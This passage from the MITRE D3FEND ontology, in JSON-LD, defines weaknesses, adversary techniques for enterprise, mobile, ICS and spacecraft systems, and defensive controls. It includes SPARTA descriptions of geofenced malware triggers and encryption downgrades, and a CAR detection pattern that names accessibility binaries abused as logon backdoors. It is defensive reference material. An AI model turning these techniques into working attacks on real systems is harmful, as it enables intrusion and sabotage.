      "@type": "owl:Class",
      "d3f:definition": "A file containing information used to configure the parameters and initial settings for some computer programs. Configuration files are used for user applications, server processes and operating system settings.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Configuration_file"
      },
      "rdfs:label": "Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      },
      "skos:altLabel": "Settings File"
    },
    {
      "@id": "d3f:CWE-471",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-471",
      "d3f:definition": "The product does not properly protect an assumed-immutable element from being modified by an attacker.",
      "rdfs:label": "Modification of Assumed-Immutable Data (MAID)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1618",
      "@type": "owl:Class",
      "d3f:attack-id": "T1618",
      "d3f:definition": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1628.002",
      "rdfs:label": "User Evasion - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1628.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "User Evasion"
    },
    {
      "@id": "d3f:CWE-1190",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1190",
      "d3f:definition": "The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product.",
      "rdfs:label": "DMA Device Enabled Too Early in Boot Phase",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-696"
      }
    },
    {
      "@id": "d3f:LogonUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Logon User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N11a27e9e3fe1488aa1080ab2d55a8978"
        }
      ]
    },
    {
      "@id": "_:N11a27e9e3fe1488aa1080ab2d55a8978",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-909",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-909",
      "d3f:definition": "The product does not initialize a critical resource.",
      "rdfs:label": "Missing Initialization of Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:CWE-1124",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1124",
      "d3f:definition": "The code contains a callable or other code grouping in which the nesting / branching is too deep.",
      "rdfs:label": "Excessively Deep Nesting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:EX-0012.10",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.10",
      "d3f:definition": "C&DH relies on tables and runtime values that define how commands are parsed, queued, and dispatched and how telemetry is collected, stored, and forwarded. Targets include opcode-to-handler maps, argument limits and schemas, queue depths and priorities, message ID routing, publish/subscribe bindings, timeline/schedule entries, file catalog indices, compression and packetization settings, and event/telemetry filters. Edits to these artifacts reshape control and visibility: commands are delayed, dropped, or misrouted; telemetry is suppressed or redirected; timelines slip; and housekeeping/data products are repackaged in ways that confuse ground processing. Because many frameworks treat these values as authoritative configuration, small changes can silently propagate across subsystems, degrading responsiveness, creating backlogs, or severing the logical pathways that keep the vehicle coordinated, without modifying the underlying code.",
      "rdfs:label": "Command & Data Handling Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/10/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Command & Data Handling Subsystem"
    },
    {
      "@id": "d3f:EX-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0006",
      "d3f:definition": "The adversary alters how confidentiality or integrity is applied so traffic or data is processed in clear or with weakened protection. Paths include toggling configuration flags that place links or storage into maintenance/test modes; forcing algorithm “fallbacks” or null ciphers; downgrading negotiated suites or keys; manipulating anti-replay/counter state so checks are skipped; substituting crypto libraries or tables during boot/update; and selecting alternate routes that carry the same content without encryption. On some designs, distinct modes handle authentication and confidentiality separately, allowing an actor who obtains authentication material to request unencrypted service or to switch to legacy profiles. The end state is that command, telemetry, or data products traverse a path the spacecraft accepts while cryptographic protection is absent, weakened, or inconsistently applied, enabling subsequent tactics such as inspection, manipulation, or exfiltration.",
      "rdfs:label": "Disable/Bypass Encryption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Disable/Bypass Encryption"
    },
    {
      "@id": "d3f:CWE-675",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-675",
      "d3f:definition": "The product performs the same operation on a resource two or more times, when the operation should only be applied once.",
      "rdfs:label": "Multiple Operations on Resource in Single-Operation Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:T1423",
      "@type": "owl:Class",
      "d3f:attack-id": "T1423",
      "d3f:definition": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).",
      "rdfs:label": "Network Service Scanning - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Service Scanning"
    },
    {
      "@id": "d3f:kb-article",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "The technique x has the kb-article y, where y is written in Markdown.",
      "rdfs:domain": {
        "@id": "d3f:Technique"
      },
      "rdfs:label": "kb-article",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-002%3ALocalNetworkSniffing_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-002/"
      },
      "d3f:kb-abstract": "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-002: Local Network Sniffing",
      "rdfs:label": "Reference - CAR-2020-11-002: Local Network Sniffing - MITRE"
    },
    {
      "@id": "d3f:EventLogStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event logging service is started, enabling the collection and recording of system events.",
      "rdfs:label": "Event Log Start Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Attribute-based Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(13)"
    },
    {
      "@id": "d3f:CWE-1393",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-1393",
      "d3f:definition": "The product uses default passwords for potentially critical functionality.",
      "d3f:weakness-of": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Use of Default Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1392"
        },
        {
          "@id": "_:Ned2316f2b01f420c8521918701d29819"
        }
      ]
    },
    {
      "@id": "_:Ned2316f2b01f420c8521918701d29819",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1030",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1030",
      "d3f:definition": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Data Transfer Size Limits",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N1fd959d0bbc949bba3dd46b49783889f"
        }
      ]
    },
    {
      "@id": "_:N1fd959d0bbc949bba3dd46b49783889f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:JavaScriptBlob",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A JavaScript Blob is a Blob that was created by a JavaScript Blob() constructor call or equivalent function.",
      "rdfs:label": "JavaScript Blob",
      "rdfs:subClassOf": {
        "@id": "d3f:BinaryLargeObject"
      }
    },
    {
      "@id": "d3f:Reference-DebuggersForAccessibilityApplications_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-006/"
      },
      "d3f:kb-abstract": "The Windows Registry location HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options allows for parameters to be set for applications during execution. One feature used by malicious actors is the \"Debugger\" option. When a key has this value enabled, a Debugging command line can be specified. Windows will launch the Debugging command line, and pass the original command line in as an argument. Adversaries can set a Debugger for Accessibility Applications. The analytic looks for the original command line as an argument to the Debugger. When the strings \"sethc.exe\", \"utilman.exe\", \"osk.exe\", \"narrator.exe\", and \"Magnify.exe\" are detected in the arguments, but not as the main executable, it is very likely that a Debugger is set.\n\nThis analytic could depend on the possibility of the known strings used as arguments for other applications used in the day-to-day environment. Although the chance of the string \"sethc.exe\" being used as an argument for another application is unlikely, it still is a possibility.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-003: Debuggers for Accessibility Applications",
      "rdfs:label": "Reference - CAR-2014-11-003: Debuggers for Accessibility Applications - MITRE"
    },
    {
      "@id": "d3f:CWE-1420",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1420",
      "d3f:definition": "A processor event or prediction may allow incorrect operations (or correct operations with incorrect data) to execute transiently, potentially exposing data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:T1087.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.002",
      "d3f:definition": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.",
      "d3f:enumerates": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N28d068c98ccf4ef1991f57254c9b34fc"
        }
      ]
    },
    {
      "@id": "_:N28d068c98ccf4ef1991f57254c9b34fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-1421",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1421",
      "d3f:definition": "A processor event may allow transient operations to access architecturally restricted data (for example, in another address space) in a shared microarchitectural structure (for example, a CPU cache), potentially exposing the data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:AML.T0016.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.001",
      "d3f:definition": "Adversaries may search for and obtain software tools to support their operations.\nSoftware designed for legitimate use may be repurposed by an adversary for malicious intent.\nAn adversary may modify or customize software tools to achieve their purpose.\nSoftware tools used to support attacks on AI systems are not necessarily AI-based themselves.",
      "rdfs:label": "Software Tools - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Software Tools"
    },
    {
      "@id": "d3f:PreAuthenticationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing preparatory steps or processes conducted prior to the primary authentication operation. Pre-authentication often involves initial protocol exchanges, cryptographic challenges, or the validation of supplemental factors (e.g., pre-shared keys) to ensure the readiness and security of the authentication workflow.",
      "rdfs:label": "Pre-Authentication Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N915b3e8d80b94fad8da00da182461829"
        }
      ]
    },
    {
      "@id": "_:N915b3e8d80b94fad8da00da182461829",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:HierarchicalClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HC",
      "d3f:definition": "Hierarchical clustering (also called hierarchical cluster analysis or HCA) is a method of cluster analysis that seeks to build a hierarchy of clusters.",
      "d3f:kb-article": "## References\nWikipedia. (2021, August 10). Hierarchical clustering. [Link](https://en.wikipedia.org/wiki/Hierarchical_clustering)",
      "rdfs:label": "Hierarchical Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:ClusterAnalysis"
      }
    },
    {
      "@id": "d3f:T1005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ],
      "d3f:attack-id": "T1005",
      "d3f:definition": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.",
      "rdfs:label": "Data from Local System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nec41a456616d48858898ba4c3bf30324"
        },
        {
          "@id": "_:Ncc313b771c6f48329395f00984da59a6"
        }
      ]
    },
    {
      "@id": "_:Nec41a456616d48858898ba4c3bf30324",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Ncc313b771c6f48329395f00984da59a6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACE_TRACEME",
      "@type": "owl:Class",
      "d3f:definition": "Indicates that the process is to be traced by its parent.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_TRACEME",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceProcess"
      }
    },
    {
      "@id": "d3f:Reference-UserActivityFromStoppingWindowsDefensiveServices_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-003/"
      },
      "d3f:kb-abstract": "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:kb-reference-title": "CAR-2016-04-003: User Activity from Stopping Windows Defensive Services",
      "rdfs:label": "Reference - CAR-2016-04-003: User Activity from Stopping Windows Defensive Services - MITRE"
    },
    {
      "@id": "d3f:EX-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RuntimeVariable"
      },
      "d3f:attack-id": "EX-0002",
      "d3f:definition": "Malware or implanted procedures execute only when the spacecraft’s state meets geometric and temporal criteria. Triggers can be defined in orbital elements, inertial or Earth-fixed coordinates, relative geometry, lighting conditions, or time references. The code monitors on-board navigation solutions, ephemerides, or propagated TLEs and arms itself when thresholds are met (e.g., “only fire over region X,” “only activate during LEOP,” or “only run within N seconds of a scheduled downlink.”) Geofencing reduces exposure and aids deniability: triggers are rare, aligned with mission cadence, and hard to reproduce on the ground. More elaborate variants require conjunctions of conditions (position + attitude + clock epoch) or incorporate drift so the trigger slowly evolves with the orbit. The result is effect-on-demand: execution occurs precisely where and when the actor intends, while remaining dormant elsewhere.",
      "rdfs:label": "Position, Navigation, and Timing (PNT) Geofencing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:Nec7555b092d94e2cbf6eddc72944f9ff"
        }
      ],
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Geofencing"
    },
    {
      "@id": "_:Nec7555b092d94e2cbf6eddc72944f9ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:T1574.013",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574.013",
      "d3f:definition": "Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)",
      "rdfs:label": "KernelCallbackTable",
      "rdfs:subClassOf": {
        "@id": "d3f:T1574"
      }
    },
    {
      "@id": "d3f:CCI-002748_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the use of the manual override capability to only organization-defined authorized individuals.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002748"
    },
    {
      "@id": "d3f:IntranetWebNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet web network traffic is network traffic that does not cross a given network's boundaries and uses a standard web protocol.",
      "d3f:may-contain": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Intranet Web Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetworkTraffic"
        },
        {
          "@id": "d3f:WebNetworkTraffic"
        },
        {
          "@id": "_:N4cf5cb7690964964be551c2104c72d89"
        }
      ]
    },
    {
      "@id": "_:N4cf5cb7690964964be551c2104c72d89",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CCI-002476_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of organization-defined information at rest on organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002476"
    },
    {
      "@id": "d3f:CCI-001019_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to protect information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001019"
    },
    {
      "@id": "d3f:T1546.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.008",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:may-modify": [
        {
          "@id": "d3f:ExecutableBinary"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        }
      ],
      "rdfs:label": "Accessibility Features",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N75827d8793364ca6b3b4bae37384df06"
        },
        {
          "@id": "_:N78ead1386ee346d7b36dbe41a475509a"
        },
        {
          "@id": "_:Nfd713f730ae54325ad6146e88b6989cc"
        }
      ]
    },
    {
      "@id": "_:N75827d8793364ca6b3b4bae37384df06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:N78ead1386ee346d7b36dbe41a475509a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "_:Nfd713f730ae54325ad6146e88b6989cc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T0867",
      "@type": "owl:Class",
      "d3f:attack-id": "T0867",
      "d3f:definition": "Adversaries may transfer tools or other files from one system to another to stage adversary tools or other files over the course of an operation. (Citation: Enterprise ATT&CK) Copying of files may also be performed laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Lateral Tool Transfer - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Lateral Tool Transfer"
    },
    {
      "@id": "d3f:CWE-419",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-419",
      "d3f:definition": "The product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.",
      "rdfs:label": "Unprotected Primary Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:GNSSSignal",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A GNSS (Global Navigation Satellite System) signal is a low-power radio signal broadcast from satellites that contains a carrier wave, a ranging code, and a navigation message. The receiver uses the carrier wave to precisely measure the time it takes for the signal to travel from the satellite, while the navigation message provides essential information like the satellite's position (ephemeris) and clock information.",
      "d3f:synonym": "Global Navigation Satellite System Signal",
      "rdfs:label": "GNSS Signal",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Satellite_navigation"
        },
        {
          "@id": "https://gssc.esa.int/navipedia/index.php/GNSS_signal"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ElectromagneticSignal"
        },
        {
          "@id": "_:Ne9f5c46399fa40eeb9f5101af96778db"
        }
      ]
    },
    {
      "@id": "_:Ne9f5c46399fa40eeb9f5101af96778db",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSTimeRecord"
      }
    },
    {
      "@id": "d3f:CWE-1189",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1189",
      "d3f:definition": "The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents.",
      "rdfs:label": "Improper Isolation of Shared Resources on System-on-a-Chip (SoC)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-653"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:IntegerRangeValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-IRV",
      "d3f:definition": "Ensuring that an integer is within a valid range.",
      "d3f:hardens": {
        "@id": "d3f:MathematicalFunction"
      },
      "d3f:kb-article": "## How it Works\nInteger Range Validation can be done by programmatically checking the value of an integer before or after an operation to determine if the resulting value will be valid.\nChecking the value of an integer to ensure it is in a valid range helps prevent integer overflow, wraparound, and logical errors.\n\n## Considerations\n* A valid range can be defined by language, data-type, or logical constraints.\n* Take extra care when doing operations on integers that will result in a value close to the bounds of a valid range.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-IntegerRangeValidation_SEI"
      },
      "rdfs:label": "Integer Range Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SourceCodeHardening"
        },
        {
          "@id": "_:N6254134324a74adaa194814978d47d46"
        }
      ]
    },
    {
      "@id": "_:N6254134324a74adaa194814978d47d46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MathematicalFunction"
      }
    },
    {
      "@id": "d3f:DE-0003.10",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.10",
      "d3f:definition": "A satellite with a GPS receiver can use ephemeris data from GPS satellites to estimate its own position in space. A hostile actor could spoof the GPS signals to cause erroneous calculations of the satellite’s position. The received ephemeris data is often telemetered and can be monitored for indications of GPS spoofing. Reception of ephemeris data that changes suddenly without a reasonable explanation (such as a known GPS satellite handoff), could provide an indication of GPS spoofing and warrant further analysis. Threat actors could also change the course of the vehicle and falsify the telemetered data to temporarily convince ground operators the vehicle is still on a proper course.",
      "rdfs:label": "GPS Ephemeris - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/10/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "GPS Ephemeris"
    },
    {
      "@id": "d3f:CCI-001400_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001400"
    },
    {
      "@id": "d3f:EX-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0009",
      "d3f:definition": "The adversary executes actions on-board by abusing defects in software that runs on the vehicle, ranging from application logic in flight software to libraries, drivers, and supporting services. Outcomes range from arbitrary code execution and privilege escalation to silent logic manipulation (e.g., bypassing interlocks, suppressing alarms) that appears operationally plausible. The hallmark of this technique is that the attacker co-opts existing code paths, often rarely used ones, to run unintended behavior under nominal interfaces. These attacks may be extremely targeted and tailored to specific coding errors introduced as a result of poor coding practices or they may target known issues in the commercial software components.",
      "rdfs:label": "Exploit Code Flaws - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Code Flaws"
    },
    {
      "@id": "d3f:T1627",
      "@type": "owl:Class",
      "d3f:attack-id": "T1627",
